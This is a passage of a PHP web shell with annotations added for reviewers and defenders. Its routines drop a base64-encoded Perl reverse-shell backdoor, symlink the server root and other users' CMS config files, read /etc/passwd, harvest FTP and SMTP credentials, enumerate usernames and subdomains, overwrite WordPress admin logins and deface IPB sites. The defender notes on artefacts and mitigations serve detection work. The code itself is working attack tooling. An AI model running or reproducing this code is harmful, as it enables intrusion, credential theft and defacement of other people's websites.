1472 fwrite ( $dosya , $metin ) ;
1473 fclose ($dosya);
1474$cgishellizocin = '
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
1476';
1477
1478$file = fopen("cgi.cin" ,"w+");
1479$write = fwrite ($file ,base64_decode($cgishellizocin));
1480fclose($file);
1481 chmod("cgi.cin",0755);
1482$netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
1483MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
1484ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
1485MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
1486ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
1487MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
1488Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
1489KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
1490SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
1491ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
1492UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
1493VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
1494ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
1495JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
1496bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
1497ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
1498YXRhY2hlZFxuXG4iOw==';
1499
1500$file = fopen("dc.pl" ,"w+");
1501$write = fwrite ($file ,base64_decode($netcatshell));
1502fclose($file);
1503 chmod("dc.pl",0755);
1504 echo "<iframe src=cgi-telnet/cgi.cin width=100% height=100% frameborder=0></iframe> ";
1505echo '</div>';
1506wsoFooter(); }
1507##################### Tools #########################
// Renders the "Tools" menu. Each link calls the client-side helper g() (defined
// outside this excerpt) with an action name and $GLOBALS['home_cwd'].
// NOTE(review): home_cwd is concatenated into a single-quoted JavaScript string
// inside an onclick attribute with no escaping.
// Defender note: the link captions and action names in this literal are fixed
// strings, which makes the block a stable anchor for content signatures when
// scanning a web root. How g() submits the action name is not visible here.
1508function actiontools() {
1509wsoHeader();
1510echo'
1511<center>
1512<a href=# onclick="g(\'mass\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Folders Mass Defacer ]</a><br><br>
1513<a href=# onclick="g(\'config\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Config Grabber ]</a><br><br>
1514<a href=# onclick="g(\'configsh\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Config Killer ]</a><br><br>
1515<a href=# onclick="g(\'zoneh\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Zone-h Poster ]</a><br><br>
1516<a href=# onclick="g(\'ftpsmtp\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ FTP And SMTP Config Grabber ]</a><br><br>
1517<a href=# onclick="g(\'Php\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ PHP Exec ]</a><br><br>
1518<a href=# onclick="g(\'userchecker\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Web Site Username Checker ]</a><br><br>
1519<a href=# onclick="g(\'cpcrack\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Cpanel Cracker ]</a><br><br>
1520<a href=# onclick="g(\'lfiscan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ LFI ]</a><br><br>
1521<a href=# onclick="g(\'BruteForce\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ FTP BrutForce ]</a><br><br>
1522<a href=# onclick="g(\'sub\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Sub Domain Checker ]</a><br><br>
1523<a href=# onclick="g(\'shellfind\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Shell Finder ]</a><br><br>
1524';
1525wsoFooter();}
1526#################### Config Killer #################
// "Config Killer" action. Three independent POST-triggered steps:
//   ini  - writes a file named php.ini into the working directory containing
//          the single line " disbale_functions=none " and links to it.
//   usre - reads /etc/passwd and lists the first field of every line (the
//          account names) in a textarea that is posted back as `user`.
//   su   - creates phdz-root2/ and phdz-config2/ (mode 0777), drops an
//          .htaccess into each, symlinks "/" to phdz-root2/root, then for every
//          posted account name and every entry of a fixed list of CMS config
//          file names creates a symlink
//          phdz-config2/<name> .. <file> -> /home/<name>/public_html/<file>.
// The .htaccess content maps .php to text/plain, so a file reached through one
// of these links would be returned as text rather than executed (assuming the
// server honours the override -- not verifiable from here).
//
// Defender notes:
//  - Artefacts to hunt for under a document root: directories named phdz-root2
//    or phdz-config2, a symlink whose target is "/", symlinks pointing into
//    other accounts' public_html, a stray php.ini, and an .htaccess containing
//    "AddType text/plain .php".
//  - The step depends on the web server following symlinks across account
//    boundaries and on other accounts' config files being readable by the
//    serving process. Requiring owner match for symlinks
//    (Options SymLinksIfOwnerMatch), not letting .htaccess override Options or
//    FileInfo, and keeping home directories and config files unreadable to
//    other accounts each break it.
//  - Database credentials in any config file that became reachable this way
//    should be treated as exposed and rotated.
1527function actionconfigsh() {
1528wsoHeader();
1529echo'
1530<center><h1>Config Killer</h1>
1531<center><form method=post><font color=white size=2 face="comic sans ms">Creat PHP.ini To Bypass Disbale Functions</font><p>
1532<center><input type="hidden" name="a" value="configsh"><input type=submit name=ini value="PHP.ini" /></form>
1533<center><form method=post><font color=white size=2 face="comic sans ms">Extract Username To Symlink</font><p>
1534 <cente><input type="hidden" name="a" value="configsh"><input type=submit name="usre" value="Extract Usernames" /></form><br>';
 // Step "ini": drops a per-directory php.ini; the file handle is never closed.
1535 if(isset($_POST['ini']))
1536 {
1537
1538 $r=fopen('php.ini','w');
1539 $rr=" disbale_functions=none ";
1540 fwrite($r,$rr);
1541 $link="<br><a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>PHP.INI</u></font></a>";
1542 echo $link;
1543
1544 }
1545
1546
1547
1548 ?>
1549
1550
1551 <?php
 // Step "usre": account names from /etc/passwd are echoed into the textarea unescaped.
1552 if(isset($_POST['usre'])){
1553 ?><form method=post>
1554 <textarea rows=10 cols=50 name=user><?php $users=file("/etc/passwd");
1555foreach($users as $user)
1556{
1557$str=explode(":",$user);
1558echo $str[0]."\n";
1559}
1560
1561?></textarea><br><br>
1562 <input type="hidden" name="a" value="configsh"><input type=submit name=su value="Get Symlink !" /></form>
1563 <?php } ?>
1564 <?php
 // Turns off PHP error reporting, so failed mkdir()/symlink() calls below are silent.
1565 error_reporting(0);
1566 echo "<font size=2 face=\"comic sans ms\">";
 // Step "su": builds the two symlink directories described in the header comment.
1567 if(isset($_POST['su']))
1568 {
1569 mkdir('phdz-root2',0777);
1570$rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1571$g = fopen('phdz-root2/.htaccess','w');
1572fwrite($g,$rr);
// Link to the filesystem root; the return value is stored but never checked.
1573$indishell = symlink("/","phdz-root2/root");
1574 $rt="<a href=phdz-root2/root><font color=white size=3 face=\"comic sans ms\"> Root</font></a>";
1575 echo " [+] Root Symlink<br><u>$rt</u>";
1576
1577 $dir=mkdir('phdz-config2',0777);
1578 $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1579 $f = fopen('phdz-config2/.htaccess','w');
1580
1581 fwrite($f,$r);
1582 $consym="<a href=phdz-config2/><font color=white size=3 face=\"comic sans ms\">Configs</font></a>";
1583 echo "<br>[+] Config Grabbed<br><u><font size=2 face=\"comic sans ms\">$consym</font></u>";
1584
 // Posted names are trimmed but not otherwise validated before being used in
 // both the link name and the link target.
1585 $usr=explode("\n",$_POST['user']);
1586 $configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");
1587 foreach($usr as $uss )
1588 {
1589 $us=trim($uss);
1590
1591 foreach($configuration as $c)
1592 {
1593 $rs="/home/".$us."/public_html/".$c;
1594 $r="phdz-config2/".$us." .. ".$c;
1595 symlink($rs,$r);
1596
1597 }
1598
1599 }
1600
1601
1602 }
1603wsoFooter(); }
1604#################### FTP SMTP ####################
// "FTP And SMTP Configs Grabber" action. When `form_action` is posted it:
//  1. fetches $_POST['url'] with file_get_contents() and splits the response on
//     '<li><a href="' to collect the linked file names (appended to jftp.txt);
//  2. sorts those names into joomla.txt / others.txt by whether they contain
//     "oomla", then deletes jftp.txt and others.txt;
//  3. fetches each name from joomla.txt below the posted URL and pulls the
//     values of ftp_host, ftp_user, ftp_pass, ftp_enable, smtpuser, smtppass,
//     smtphost and smtpport out of the text with entre2v2();
//  4. prints the extracted values in an HTML table and deletes joomla.txt.
//
// NOTE(review): the posted URL and everything extracted from the fetched text
// are echoed without htmlspecialchars(); $getconfig is reused for both the
// list being iterated and each fetched body.
// Defender notes: while it runs, the routine creates jftp.txt, others.txt and
// joomla.txt in the working directory and makes the PHP process issue one
// outbound fetch per listed file to a caller-chosen URL. With allow_url_fopen
// disabled, or egress from the web tier filtered, those fetches fail. FTP and
// SMTP credentials stored in a configuration file that was readable this way
// should be treated as exposed and rotated.
1605function actionftpsmtp() {
1606wsoHeader();
1607?>
1608<center>
1609<h1><b>FTP And SMTP Configs Grabber</b></h1>
1610<FORM action="" method="post">
1611<input type="hidden" name="form_action" value="1">
1612<table border=1>
1613<tr><td><span>Configs Link :</span></td><td><input type="text" size="60" name="url" value="www.gov.dz/phdz-config/"></td></tr>
1614</table>
1615<br>
1616<input type="hidden" name="a" value="ftpsmtp"><INPUT class=submit type="submit" value=">>" >
1617</FORM>
1618</font>
1619</center>
1620</body>
1621</html>
1622<?
1623if (array_key_exists('form_action', $_POST)){
1624echo('<center><br><br>');
1625echo "<span>";
1626
// The posted URL is reflected into the page and then fetched, both unvalidated.
1627echo "[] Getting Config URL : [] ".$_POST['url'];
1628$url1=file_get_contents($_POST['url']);
1629$ar = explode('<li><a href="', $url1);
// Starts at index 2, so the first listed link is skipped.
1630for($vi=2;$vi < count($ar);$vi++)
1631 {
1632
1633$var1 = strtok($ar[$vi], " ");
1634$var1 = substr($var1,0,-2);
1635$link = $url1.$var1;
1636$filename = 'jftp.txt';
1637$fp = fopen($filename, "a+");
1638$write = fputs($fp, $var1."\n");
1639fclose($fp);
1640}
1641echo "<br>";
1642echo "[] Collected All Config Names []";
1643echo "<br>";
1644echo "[] Seperating Joomla Configs []";
1645echo "<br>";
1646$joomconfigs=file('jftp.txt');
// Hides errors and removes the execution time limit for the rest of the request.
1647ini_set("display_errors", "0");
1648set_time_limit(0);
1649foreach ($joomconfigs as $joomconfig) {
1650$pos = strpos($joomconfig,"oomla");
1651if($pos === false) {
1652$filename = 'others.txt';
1653$fp = fopen($filename, "a+");
1654$write = fputs($fp, $joomconfig."\n");
1655fclose($fp);
1656}
1657else {
1658$filename = 'joomla.txt';
1659$fp = fopen($filename, "a+");
1660$write = fputs($fp, $joomconfig."\n");
1661fclose($fp);
1662}
1663}
1664unlink ('jftp.txt');
1665unlink ('others.txt');
1666echo "[] Joomla Configs Seperated []";
1667echo "<br>";
1668echo "[] Scanning JOOMLA FTP Credentials []";
1669echo "<br>";
1670echo ("<center><table border=1 cellspacing=1 cellpading=1>
1671<tr><th width='400'><span>SMTP DETAILS</span></th><th width=200><span>FTP Host</span></th> <th width=150><span>FTP Username</span></td><th width=150><span>FTP Password</span></td><th width=100><span>ENABLED</span></td></tr>");
1672
1673$getconfig=file('joomla.txt');
1674foreach ($getconfig as $gconfig) {
1675$strlengconfig=strlen($gconfig);
1676if ($strlengconfig > 2) {
// $gconfig still carries the line ending read by file(); it is appended to the URL as-is.
1677$urltoconfig=$_POST['url']."/".$gconfig;
1678$getconfig=file_get_contents($urltoconfig);
1679$ftphost=entre2v2($getconfig,"ftp_host = '","';");
1680$ftpuser=entre2v2($getconfig,"ftp_user = '","';");
1681$ftppass=entre2v2($getconfig,"ftp_pass = '","';");
1682$ftpenable=entre2v2($getconfig,"ftp_enable = '","';");
1683$smtpuser=entre2v2($getconfig,"smtpuser = '","';");
1684$smtppass=entre2v2($getconfig,"smtppass = '","';");
1685$smtphost=entre2v2($getconfig,"smtphost = '","';");
1686$smtpport=entre2v2($getconfig,"smtpport = '","';");
1687
// Both branches print the same row; only the colour of the ENABLED cell differs.
1688if ($ftpenable==1){
1689$ftpenabled="YES";
1690echo "<center><table border=1 cellspacing=1 cellpading=1>
1691<tr><td width='400'><font color='green' face='courier new' > host=$smtphost <br> port=$smtpport <br> user=$smtpuser <br> pass=$smtppass <br> </font></td><td width=200><font color='green' face='courier new' > $ftphost </font></td><td width=150><font color='green' face='courier new'> $ftpuser<font></td><td width=150><font color='green' face='courier new'> $ftppass</font></td><td width=100><font color='green' face='courier new'> $ftpenabled </font></td></tr></table></center>";
1692}
1693else {
1694$ftpenabled="NO";
1695echo "<center><table border=1 cellspacing=1 cellpading=1>
1696<tr><td width='400'><font color='green' face='courier new' > host=$smtphost <br> port=$smtpport <br> user=$smtpuser <br> pass=$smtppass <br></font></td><td width=200><font color='green' face='courier new' > $ftphost </font></td><td width=150><font color='green' face='courier new'> $ftpuser<font></td><td width=150><font color='green' face='courier new'> $ftppass</font></td><td width=100><font color='red' face='courier new'> $ftpenabled </font></td></tr></table></center>";
1697}
1698}
1699}
1700
1701echo"</font>";
1702echo('</center>');
1703unlink ('joomla.txt');
1704}
// Returns the trimmed text that follows the $i-th occurrence of
// $marqueurDebutLien in $text, up to the next $marqueurFinLien.
// There is no check that either marker is present.
1705function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
1706 $ar0=explode($marqueurDebutLien, $text);
1707 $ar1=explode($marqueurFinLien, $ar0[$i]);
1708 return trim($ar1[0]);
1709}
1710wsoFooter(); }
1711######################### Web Site Username Checker ##########################
// "Web Site Username Checker" action. Takes the posted site URL (`si`), strips
// "http://", "https://", ".", "-", "/" and "www" from it with replace(), and
// builds one prefix of the stripped string per length from 0 up to the length
// of the unstripped value. Each prefix is echoed and, when `b0x` was posted,
// cURL() requests <si>/cgi-sys/guestbook.cgi?user=<prefix>; prefixes whose
// response does not contain "Invalid username" are printed in red.
//
// NOTE(review): $_POST['si'] is read on every call, not only after a submit,
// and the prefixes are echoed unescaped. cURL() and replace() are declared
// inside this function body. eregi() was removed in PHP 7, so the code targets
// PHP 5.x.
// Defender notes: on the receiving host this appears as a burst of GET
// requests to /cgi-sys/guestbook.cgi whose `user` value grows by one character
// per request. What it relies on is an endpoint that answers differently for
// existing and non-existing account names; a uniform response and rate
// limiting on that path remove the signal.
1712function actionuserchecker() {
1713wsoHeader();
1714echo' <center><h1>Web Site Username Checker</h1><br><br>
1715 </center>
1716 </center>
1717 <form method="post"><center>
1718 <input type="text" name="si" value="http://www.gov.dz/"><br />
1719 <input type="hidden" name="a" value="userchecker"><input type="submit" name="b0x" value=">>" ><br></form>
1720 ';
1721 $fo = $_POST['si'];
1722 $fo2 = $fo;
 // Length is taken before stripping, so the loop below runs past the end of
 // the stripped string and repeats the full value.
1723 $strlen = strlen($fo2);
1724 $fo2 = replace($fo2);
1725 for($i=0;$i<=$strlen;$i++)
1726 {
1727 $words[] = substr($fo2 ,0 ,$i);
1728 }
1729
1730 foreach($words as $users)
1731 {
1732 echo $users."<br>";
1733 if($_POST['b0x'])
1734 {
1735 cURL($fo,$users);
1736 }
1737 }
1738
 // Issues one GET to the guestbook CGI for the given name and returns the body.
 // Redirects are followed; no timeout is set.
1739 function cURL($fo,$users)
1740 {
1741 $curl = curl_init();
1742 curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
1743 curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
1744 curl_setopt($curl,CURLOPT_URL, $fo."/cgi-sys/guestbook.cgi?user={$users}");
1745 $start = curl_exec($curl);
1746 if(!eregi("Invalid username", $start))
1747 {
1748 echo "<font face='Tahoma' size='2' color='red'><b>{$users}</b></font><br>";
1749 }
1750 return $start;
1751 }
1752
 // Removes scheme, dots, dashes, slashes and "www" from the given string.
1753 function replace($fo)
1754 {
1755 $search = array('http://','https://','.','-','/','www');
1756 $str = str_replace($search , "", $fo);
1757 return $str;
1758 }
1759wsoFooetr(); }
1760####################### sub domain #######################
// "Subdomain Checker" action. On any POST it prepends each entry of a fixed
// word list to $_POST['site'] and resolves the resulting name with
// gethostbyname(). gethostbyname() returns its argument unchanged on failure,
// so "result does not match the posted site" is used as the success test.
//
// NOTE(review): $_POST['site'] is used as the eregi() pattern and is echoed
// unescaped; each successful name is resolved twice; set_time_limit(0) removes
// the execution time limit. eregi() was removed in PHP 7, so the code targets
// PHP 5.x.
// Defender note: the resolver used by the web host sees one forward lookup per
// word-list entry, all for sibling labels of a single domain, within one
// request -- a pattern that stands out in DNS query logs.
1761function actionsub() {
1762wsoHeader();
1763echo '<br><center><h1>Subdomain Checker</h1><center><br>';
1764echo'<html><body><center></br>
1765<form method="post">
1766<input type="text" name="site" size="20" placeholder="www.site.com">
1767<input type="hidden" name="a" value="sub"><input type="submit" value="Check it Please !">
1768</form>
1769</font>';
1770echo '<br><center><span>( Delete http:// )</span><center><br>';
1771set_time_limit(0);
1772$subs = array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","lan","phpmyadmin","administrator","mape","isp","shop","rex","podcast","potraga","sensation","igre","foo","api","access","ulaz","pam","sport","pretraga","pricaonica","kuvar","raketa","wwwmobile","s1","s2","foro","s3","box","open","abc","phpbb3","phpbb2","internet","phpbb","whm","mysql","webadmin","adm","admin","admins","agent","aix","recnik","alerts","av","antivirus","app","apps","appserver","archive","as400","auto","backup","banking","bbdd","bbs","bea","beta","blog","catalog","cgi","channel","channels","chat","cisco","client","clients","club","cluster","clusters","code","commerce","community","compaq","conole","consumer","contact","contracts","corporate","ceo","cso","cust","customer","cpanel","data","bd","db2","default","demo","cms","design","desktop","dev","develop","developer","device","dial","digital","dir","directory","disc","discovery","disk","dns","dns1","dns2","dns3","docs","poslovi","prijemni","znanje","mojtim","documents","domain","domains","dominoweb","download","downloads","ecommerce","e-commerce","edi","edu","education","email","enable","engine","engineer","enterprise","slike","galerija","error","event","events","example","exchange","extern","external","extranet","fax","field","finance","firewall","forum","forums","fsp","ftp","ftp2","fw","fw1","gallery","galleries","games","gateway","gopher","guest","gw","hello","helloworld","help","helpdesk","arkiva","lajme","faqe","helponline","hp","ibm","ibmdb","ids","ILMI","film","navigator","nalog","prodavnica","zdravlje","reklamiranje","zivot","images","imap","pomoc","imap4","img","imgs","info","intern","internal","intranet","invalid","iphone","ipsec","irc","ircserver","jobs","ldap","link","linux","lists","listserver","local","localhost","log","logs","login","lotus","mail","mailboxes","mailhost","result","management","manage","manager","map","maps","marketing","device","media","member","members
","messenger","mngt","mobile","monitor","multimedia","music","my","names","lojra","albania","bisedo","puka","foto","emra","njohje","vip","egea-tirana","historia","forumi","vesti","administracija","net","new1","new","perkohesisht","netdata","netstats","network","news","nms","nntp","ns","ns1","ns2","ns3","ntp","online","openview","oracle","outlook","page","pages","partner","partners","pda","personal","ph","pictures","pix","pop","pop3","portal","press","print","printer","private","project","projects","proxy","public","ra","radio","raptor","ras","read","register","remote","report","reports","root","router","lister","rwhois","sac","schedules","scotty","search","secret","secure","security","seri","serv","serv2","server","service","services","shop","shopping","site","sms","smtp","smtphost","snmp","snmpd","snort","solaris","1","2","3","4","5","6","7","8","9","0","solutions","support","source","sql","ssl","stats","store","stream","streaming","sun","support","switch","sysback","system","tech","terminal","test","testing","testing123","time","tivoli","training","transfers","uddi","update","upload","uploads","video","vpn","w1","w2","w3","wais","wap","web","webdocs","weblib","weblogic","webmail","webserver","webservices","websphere","whois","wireless","work","world","write","ws","ws1","ws2","ws3","www1","www2","www3","www4","www5","www6","www7","www8","www9","drupal","wordpress","joomla","db","database","love");
// Any POST to this action triggers the lookups; the field itself is not checked for presence.
1773if($_POST){
1774$url = $_POST["site"];
1775foreach($subs as $sub){
1776if(!eregi($url, gethostbyname($sub.".".$url))){
1777echo '<font face="Baskerville Old Face" color="#df5">'.$sub.".".$url.' : </font><font color="green">'.gethostbyname($sub.".".$url).'</font></br>';
1778}else{
1779echo '<font face="Baskerville Old Face" color="#df5">'.$sub.".".$url.' : Nothing Found</font></br>';
1780}
1781}
1782}
1783wsoFooter();}
1784####################### Forums #######################
// Renders the "Forums" menu: links grouped under Wordpress, Joomla, Vbulletin,
// PHPBB and IPB headings. Each link calls the client-side helper g() (defined
// outside this excerpt) with an action name and $GLOBALS['home_cwd'].
// NOTE(review): home_cwd is concatenated into a single-quoted JavaScript string
// inside an onclick attribute with no escaping.
// Defender note: every entry here leads to a routine that changes an
// application's admin login or front page through its database, so finding
// this file on a host means the CMS databases reachable from it need to be
// reviewed for unexpected admin accounts and altered templates, not only the
// file system.
1785function actionforum() {
1786wsoHeader();
1787echo'
1788<center>
1789<h1>Wordpress</h1>
1790<a href=# onclick="g(\'wpsym\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ WordPress Login Changer From Config ]</a><br><br>
1791<a href=# onclick="g(\'wpkey\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ WordPress Login Changer From Keyboard ]</a><br><br>
1792<center>
1793<h1>Joomla</h1>
1794<a href=# onclick="g(\'jmsym\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Joomla Login Changer From Config ]</a><br><br>
1795<a href=# onclick="g(\'jmkey\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Joomla Login Changer From Keyboard ]</a><br><br>
1796<center>
1797<h1>Vbulletin</h1>
1798<a href=# onclick="g(\'vbindex\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Vbulletin index changer ]</a><br><br>
1799<center>
1800<h1>PHPBB</h1>
1801<a href=# onclick="g(\'phpbb\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ PHPBB index changer ]</a><br><br>
1802<center>
1803<h1>IPB</h1>
1804<a href=# onclick="g(\'ipb\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ IPB index changer ]</a><br><br>
1805<center>
1806';
1807wsoFooter(); }
1808######################### IPB #######################
// "IPB index Changer" action. Renders a form for MySQL host, database, user,
// password and a table name, plus a textarea of replacement HTML, then -- when
// a database name was posted -- connects with the legacy mysql_* API and runs
//   UPDATE <f14> SET set_cache_wrapper = '<index3>'
// with no WHERE clause, i.e. against every row of the named table.
//
// NOTE(review): the table name and the HTML are concatenated into the SQL text
// unescaped; `$database3=$_POST['f11']` in the condition is an assignment, not
// a comparison; the `or die` after the string assignment can never fire.
// mysql_* was removed in PHP 7, so the code targets PHP 5.x.
// Defender notes: the form pre-fills only host and table name, so the database
// credentials have to be obtained elsewhere first -- this is a post-compromise
// step. In database audit logs it shows as an unqualified UPDATE of
// set_cache_wrapper coming from the web host. Restoring that column from
// backup and rotating the database password are part of recovery; a
// least-privilege application account and config files unreadable to other
// accounts limit the reach.
1809function actionipb() {
1810wsoHeader();
1811echo'<center><h1> IPB index Changer </h1>
1812<form method = "POST">
1813<table border = "1" width="443" height="316" style="text-align: center" align="center">
1814<tr>
1815<td height="105" width="780">
1816<p align="center"><b>Host : </b>
1817<input type="text" name="f10" size="20" value="localhost"> <b>
1818DataBase :</b> <input type ="text" name = "f11" size="20"></p>
1819<p align="center"> <b>User :</b>
1820<input type ="text" name = "f12" size="20">
1821<b> Password :</b> <input type ="text" name = "f13" size="20"><p align="center">
1822<b>Table Prefix:</b><br>
1823<input type ="text" name = "f14" size="20" value="ibf_skin_sets"></td>
1824</tr>
1825<tr>
1826<td height="167" width="780"><p align="center"> <textarea name="index3" cols=53 rows=9> <br><center>Hacked By Phenomene Dz <br><center>[ Martyrs Crew ]<br>#Algerian Hacker <br><center>#Free Pilastine <br><center>#www.fb.com/J1jeI
1827 </textarea><p align="center"><input type="hidden" name="a" value="ipb"><input type = "submit" value = "Deface !">
1828<input type = "reset" value = "Clear"></td>
1829</tr>
1830</tr>
1831</table>';
// All six values come straight from the POST body with no validation.
1832$localhost3 = $_POST['f10'];
1833$database3 = $_POST['f11'];
1834$username3 = $_POST['f12'];
1835$password3 = $_POST['f13'];
1836$IPB = $_POST['f14'];
1837$index3 = $_POST['index3'];
1838if($database3=$_POST['f11']){
// @ suppresses connection warnings; a failed connect or select ends the script silently.
1839$con3 =@ mysql_connect($localhost3,$username3,$password3) or die;
1840$db3 =@ mysql_select_db($database3,$con3) or die;
1841
1842$query3 = "UPDATE $IPB SET set_cache_wrapper = '$index3'" or die;
1843$result3 =@ mysql_query($query3,$con3);
1844if($result3){
1845echo "<p align='center'>
1846<marquee behavior='alternate' bgcolor='#FF0000' style='color: #000000; font-weight: bold'>[ Mr.511 ]----[ Update Finish ]----[ Mr.511 ]</marquee></p>";
1847}
1848else {
1849echo "<p align='center'><marquee behavior='alternate' bgcolor='#FF0000' style='color: #000000; font-weight: bold'>[ Mr.511 ]----[ Please Check Database Information ]----[ Mr.511 ]</marquee></p>";
1850}
1851}
1852wsoFooter(); }
1853######################## wp key ############################
/**
 * Web-shell handler for action "wpkey" (a=wpkey): WordPress admin credential overwrite.
 *
 * With POST field pwd empty it only prints a form. Otherwise it connects to
 * MySQL with the operator-supplied host, database, user and password, reads the
 * `home` option from {prefix}options to build a wp-login.php link, and issues
 * two UPDATEs on {prefix}users that replace user_login and user_pass (crypt()
 * of pwd) for the row with ID = 1.
 *
 * Defender notes: the database artifact is an unexpected user_login or
 * user_pass on the ID 1 account; the form pre-fills the new login as "jijle3".
 * All POST values are concatenated into the SQL text unescaped, and MySQL
 * error text is echoed to the client through die(mysql_error()).
 */
1854function actionwpkey() {
1855wsoHeader();
1856{
1857if(empty($_POST['pwd'])){
1858
1859echo "<br><br><center><div class='mybox'>
1860<h1>[ Wordpress login changer ]</h1>
1861<FORM method='POST'>DB Prefix : <INPUT class ='inputz' size='8' value='wp_' name='prefix' type='text'> Host : <INPUT class ='inputz' size='10' value='localhost' name='localhost' type='text'> db : <INPUT class ='inputz' size='10' value='Database' name='database' type='text'> User : <INPUT class ='inputz' size='10' value='db_user' name='username' type='text'> Pass : <INPUT class ='inputz' size='10' value='db_pass' name='password' type='text'> <br><br>New User : <INPUT class ='inputz' name='admin' size='15' value='jijle3'><br><br>New Pass : <INPUT class ='inputz' name='pwd' size='15' value='19620705'><br> <br><input type='hidden' name='a' value='wpkey' ><INPUT class='inputzbut' value='Change it Please' name='send' type='submit'></FORM></div/></center>";
1862}
1863else{$prefix = $_POST['prefix'];$localhost = $_POST['localhost'];$database= $_POST['database'];
1864$username= $_POST['username'];
1865$password= $_POST['password'];
1866$pwd= $_POST['pwd'];
1867$admin= $_POST['admin'];
// Database credentials are supplied by the operator in the request, not read from the site.
1868@mysql_connect($localhost,$username,$password) or die(mysql_error());
1869@mysql_select_db($database) or die(mysql_error());
1870$hash = crypt($pwd);
1871$grab = @mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
1872$data = @mysql_fetch_array($grab);
1873$site_url=$data["option_value"];
// Two separate UPDATEs rewrite the login name and the password hash of the ID = 1 row.
1874$jijle3=@mysql_query("UPDATE ".$prefix."users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
1875$jijle3=@mysql_query("UPDATE ".$prefix."users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
1876if($jijle3){echo '<br><br><center><h1>Done ... -> <a href="'.$site_url.'/wp-login.php" target="_blank">Login</a></h1></center>';
1877}}
1878echo '</center>';
1879}
1880wsoFooter(); }
1881######################## wp sym ############################
/**
 * Web-shell handler for action "wpsym" (a=wpsym): WordPress credential overwrite
 * driven by a configuration file.
 *
 * When POST field kill is set it loads the text at POST url with
 * file_get_contents(), extracts DB_PASSWORD, DB_USER, DB_NAME, DB_HOST and
